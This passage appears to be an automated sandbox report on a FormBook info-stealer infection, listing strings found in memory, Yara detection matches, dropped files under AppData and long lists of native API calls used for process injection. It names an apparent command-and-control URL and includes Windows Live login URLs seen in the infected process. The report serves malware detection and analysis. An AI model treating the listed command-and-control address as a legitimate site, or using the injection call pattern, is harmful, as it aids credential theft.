          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: control.exe, 0000000E.00000002.503263139.0000000005069000.00000004.00000001.sdmpString found in binary or memory: http://www.paintpartyblueprint.com
          Source: control.exe, 0000000E.00000002.503263139.0000000005069000.00000004.00000001.sdmpString found in binary or memory: http://www.paintpartyblueprint.com/3nop/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033b=z
          Source: control.exe, 0000000E.00000002.497078328.000000000076A000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken&display=windesktop&theme=win7&lc=1033&redirect_uri=htt
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Sp
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.317715716.0000000004A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.498454375.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\8LO8PUBW\8LOlogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\8LO8PUBW\8LOlogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.317715716.0000000004A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.317715716.0000000004A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.498454375.0000000000D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.498454375.0000000000D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D395D0 NtClose,LdrInitializeThunk,4_2_04D395D0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39540 NtReadFile,LdrInitializeThunk,4_2_04D39540
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D396E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04D396E0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04D39660
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39780 NtMapViewOfSection,LdrInitializeThunk,4_2_04D39780
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D397A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04D397A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39710 NtQueryInformationToken,LdrInitializeThunk,4_2_04D39710
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D398F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_04D398F0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39840 NtDelayExecution,LdrInitializeThunk,4_2_04D39840
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39860 NtQuerySystemInformation,LdrInitializeThunk,4_2_04D39860
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D399A0 NtCreateSection,LdrInitializeThunk,4_2_04D399A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04D39910
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39A50 NtCreateFile,LdrInitializeThunk,4_2_04D39A50
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_04D39A00
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39A20 NtResumeThread,LdrInitializeThunk,4_2_04D39A20
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D395F0 NtQueryInformationFile,4_2_04D395F0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39560 NtWriteFile,4_2_04D39560
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D3AD30 NtSetContextThread,4_2_04D3AD30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39520 NtWaitForSingleObject,4_2_04D39520
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D396D0 NtCreateKey,4_2_04D396D0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39650 NtQueryValueKey,4_2_04D39650
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39670 NtQueryInformationProcess,4_2_04D39670
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39610 NtEnumerateValueKey,4_2_04D39610
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39FE0 NtCreateMutant,4_2_04D39FE0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D3A770 NtOpenThread,4_2_04D3A770
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39770 NtSetInformationFile,4_2_04D39770
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39760 NtOpenProcess,4_2_04D39760
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D3A710 NtOpenProcessToken,4_2_04D3A710
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39730 NtQueryVirtualMemory,4_2_04D39730
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D398A0 NtWriteVirtualMemory,4_2_04D398A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D3B040 NtSuspendThread,4_2_04D3B040
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39820 NtEnumerateKey,4_2_04D39820
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D399D0 NtCreateProcessEx,4_2_04D399D0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39950 NtQueueApcThread,4_2_04D39950
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39A80 NtOpenDirectoryObject,4_2_04D39A80
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39A10 NtQuerySection,4_2_04D39A10
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D3A3B0 NtGetContextThread,4_2_04D3A3B0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D39B00 NtSetValueKey,4_2_04D39B00
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10429850 NtCreateFile,4_2_10429850
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10429900 NtReadFile,4_2_10429900
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10429980 NtClose,4_2_10429980
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10429A30 NtAllocateVirtualMemory,4_2_10429A30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042984A NtCreateFile,4_2_1042984A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_104298FB NtReadFile,4_2_104298FB
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042997A NtClose,4_2_1042997A
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A295D0 NtClose,LdrInitializeThunk,14_2_04A295D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29560 NtWriteFile,LdrInitializeThunk,14_2_04A29560
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29540 NtReadFile,LdrInitializeThunk,14_2_04A29540
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A296E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04A296E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A296D0 NtCreateKey,LdrInitializeThunk,14_2_04A296D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29610 NtEnumerateValueKey,LdrInitializeThunk,14_2_04A29610
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04A29660
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29650 NtQueryValueKey,LdrInitializeThunk,14_2_04A29650
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29780 NtMapViewOfSection,LdrInitializeThunk,14_2_04A29780
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29FE0 NtCreateMutant,LdrInitializeThunk,14_2_04A29FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29710 NtQueryInformationToken,LdrInitializeThunk,14_2_04A29710
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29770 NtSetInformationFile,LdrInitializeThunk,14_2_04A29770
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29860 NtQuerySystemInformation,LdrInitializeThunk,14_2_04A29860
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29840 NtDelayExecution,LdrInitializeThunk,14_2_04A29840
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A299A0 NtCreateSection,LdrInitializeThunk,14_2_04A299A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04A29910
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29A50 NtCreateFile,LdrInitializeThunk,14_2_04A29A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29B00 NtSetValueKey,LdrInitializeThunk,14_2_04A29B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A295F0 NtQueryInformationFile,14_2_04A295F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29520 NtWaitForSingleObject,14_2_04A29520
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A2AD30 NtSetContextThread,14_2_04A2AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29670 NtQueryInformationProcess,14_2_04A29670
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A297A0 NtUnmapViewOfSection,14_2_04A297A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29730 NtQueryVirtualMemory,14_2_04A29730
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A2A710 NtOpenProcessToken,14_2_04A2A710
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29760 NtOpenProcess,14_2_04A29760
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A2A770 NtOpenThread,14_2_04A2A770
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A298A0 NtWriteVirtualMemory,14_2_04A298A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A298F0 NtReadVirtualMemory,14_2_04A298F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29820 NtEnumerateKey,14_2_04A29820
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A2B040 NtSuspendThread,14_2_04A2B040
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A299D0 NtCreateProcessEx,14_2_04A299D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29950 NtQueueApcThread,14_2_04A29950
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29A80 NtOpenDirectoryObject,14_2_04A29A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29A20 NtResumeThread,14_2_04A29A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29A00 NtProtectVirtualMemory,14_2_04A29A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A29A10 NtQuerySection,14_2_04A29A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A2A3B0 NtGetContextThread,14_2_04A2A3B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007B9850 NtCreateFile,14_2_007B9850
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007B9900 NtReadFile,14_2_007B9900
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007B9980 NtClose,14_2_007B9980
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007B9A30 NtAllocateVirtualMemory,14_2_007B9A30
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007B984A NtCreateFile,14_2_007B984A
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007B98FB NtReadFile,14_2_007B98FB
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007B997A NtClose,14_2_007B997A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DB44964_2_04DB4496
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D1B4774_2_04D1B477
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DBD4664_2_04DBD466
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D0841F4_2_04D0841F
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DC25DD4_2_04DC25DD
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D0D5E04_2_04D0D5E0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D225814_2_04D22581
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DB2D824_2_04DB2D82
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D265A04_2_04D265A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DC1D554_2_04DC1D55
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DC2D074_2_04DC2D07
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04CF0D204_2_04CF0D20
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DC2EF74_2_04DC2EF7
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DA1EB64_2_04DA1EB6
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DBD6164_2_04DBD616
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D156004_2_04D15600
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D16E304_2_04D16E30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DCDFCE4_2_04DCDFCE
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DC1FF14_2_04DC1FF1
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DC28EC4_2_04DC28EC
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D0B0904_2_04D0B090
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D220A04_2_04D220A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DC20A84_2_04DC20A8
